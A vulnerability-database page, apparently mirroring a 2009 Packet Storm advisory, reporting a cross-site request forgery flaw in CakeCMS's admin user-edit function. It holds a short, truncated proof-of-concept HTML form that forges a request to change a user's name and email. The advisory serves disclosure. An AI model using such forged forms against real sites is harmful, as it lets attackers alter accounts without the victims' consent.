Lucene search

CakeCMS Cross Site Request Forgery

🗓️ 15 Jun 2009 00:00:00Reported by MnmLType

packetstorm🔗 packetstormsecurity.com👁 30 Views

CakeCMS Cross Site Request Forgery on User Edit For

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`< ------------------- header data start ------------------- >  
  
#########################################################  
  
# Application Name : CakeCMS  
  
# Vulnerable Type : Edıt USER (XSRF) Vuln  
  
# author : MnmL ~ Bug Researchers  
  
  
#############################################################  
  
< ------------------- header data end of ------------------- >  
  
  
< -- bug code start -- >  
<form action="SITE.COM/admin/users/edit/41" method="post" id="UserEditForm"><fieldset style="display: none;"><input type="hidden" value="PUT" name="_method"/></fieldset> <input type="hidden" id="UserId" value="41" name="data[User][id]"/>  
User Name : <input type="text" name="data[User][name]" size="86" maxlength="50" value="dsada" id="UserName"/>  
E-Mail : <input type="text" name="data[User][email]" size="86" maxlength="100" value="[email protected]" id="UserEmail"/>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

15 Jun 2009 00:00Current

1.4Low risk

Vulners AI Score1.4